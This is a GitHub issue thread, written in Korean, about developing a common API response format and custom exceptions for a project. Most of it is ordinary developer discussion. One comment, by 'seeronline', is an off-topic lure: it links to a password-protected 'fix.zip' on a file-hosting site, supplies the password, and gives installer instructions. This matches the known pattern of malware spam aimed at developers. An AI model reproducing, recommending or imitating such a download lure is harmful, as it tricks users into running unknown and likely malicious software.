### ISSUE TITLE
Feat:  API 공통 응답 포멧 개발하기

### ISSUE THREAD

**Issue by LeeJeongSeok** [six-do-string/jobshin#11]
### 💼 작업 설명
Rest API 통신시 요청, 응답 포멧 개발

### ✅ To-do
- [x] ApiResponse 클래스 재구성
- [x] custom exception 생성

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by LeeJeongSeok** [comment]
별도로 생성할 필요 없이 불필요한 클래스 파일만 제거했음,
추후 필요한 부분이 있다면 그때 수정해도 늦지 않을 것 같다는 판단하에 진행함
